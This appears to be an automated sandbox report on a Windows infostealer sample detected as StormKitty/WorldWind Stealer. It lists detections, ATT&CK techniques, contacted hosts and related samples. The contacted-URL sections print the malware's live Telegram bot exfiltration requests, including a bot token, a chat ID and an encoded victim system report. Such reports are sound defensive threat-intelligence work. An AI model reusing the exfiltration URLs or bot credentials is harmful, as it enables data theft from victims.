Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 OS Credential Dumping	341 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	13 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	124 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FUEvp5c8lO.exe	74%	Virustotal		Browse
FUEvp5c8lO.exe	79%	ReversingLabs	ByteCode-MSIL.Infostealer.StormKitty
FUEvp5c8lO.exe	100%	Avira	HEUR/AGEN.1305388
FUEvp5c8lO.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://api.tele	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://api.telegram.orgd	0%	Avira URL Cloud	safe
http://api.mylnikov.orgd	0%	Avira URL Cloud	safe
http://icanhazip.comd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
api.mylnikov.org	104.21.44.66	true	false	high
api.telegram.org	149.154.167.220	true	false	high
icanhazip.com	104.16.184.241	true	false	high
144.48.8.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	high
http://icanhazip.com/	false	high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	false	high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%203:15:35%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20536720%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20N2MY7%0ARAM:%204095MB%0AHWID:%2040A9177C21%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://duckduckgo.com/ac/?q=	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.telegram.org	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://api.telegram.org/bot	FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871	FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000329F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
http://icanhazip.comd	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmp385A.tmp.dat.3.dr	false		high
http://icanhazip.com/t	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage	FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000328C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.tele	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://api.mylnikov.org	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000003206000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	tmp385A.tmp.dat.3.dr	false		high
https://github.com/LimerBoy/StormKitty0&	FUEvp5c8lO.exe, 00000003.00000002.2624958083.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.orgd	FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000328C000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.orgd	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	tmp385A.tmp.dat.3.dr	false		high
http://api.mylnikov.orgd	FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/file/bot	FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://api.telegram.org	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000330C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKittyTC	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000030F5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FUEvp5c8lO.exe, 00000003.00000002.2624958083.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.mylnikov.org	FUEvp5c8lO.exe, 00000003.00000002.2624958083.000000000326D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp377A.tmp.dat.3.dr, tmp3737.tmp.dat.3.dr	false		high
https://pastebin.com/raw/7B75u64B	FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588087
Start date and time:	2025-01-10 21:14:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FUEvp5c8lO.exe renamed because original name is a hash value
Original Sample Name:	e1e6a513abf55583458cd88ec8b7af9ce2a60d169526b0e6a31183a7688b8480.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/140@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 177 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:15:28	API Interceptor	1753081x Sleep call for process: FUEvp5c8lO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.44.66	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
149.154.167.220	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
104.16.184.241	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	icanhazip.com/
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	icanhazip.com/
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	icanhazip.com/
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1358019715229232264.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	ZV2G9QQzlR.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	xrAlbTvRsz.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Xf3rn1smZw.exe	Get hash	malicious	RedLine	Browse	13.107.246.45
	ThBJg59JRC.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
api.mylnikov.org	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.196.114
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse	172.67.196.114
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
api.telegram.org	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RubzLi27lr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	6mllsKaB2q.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
CLOUDFLARENETUS	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	348426869538810128.js	Get hash	malicious	Strela Downloader	Browse	162.159.61.3
	statement.doc	Get hash	malicious	KnowBe4	Browse	104.17.245.203
	http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3D	Get hash	malicious	Unknown	Browse	104.17.245.203
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	188.114.96.3
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
CLOUDFLARENETUS	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	348426869538810128.js	Get hash	malicious	Strela Downloader	Browse	162.159.61.3
	statement.doc	Get hash	malicious	KnowBe4	Browse	104.17.245.203
	http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3D	Get hash	malicious	Unknown	Browse	104.17.245.203
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	188.114.96.3
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
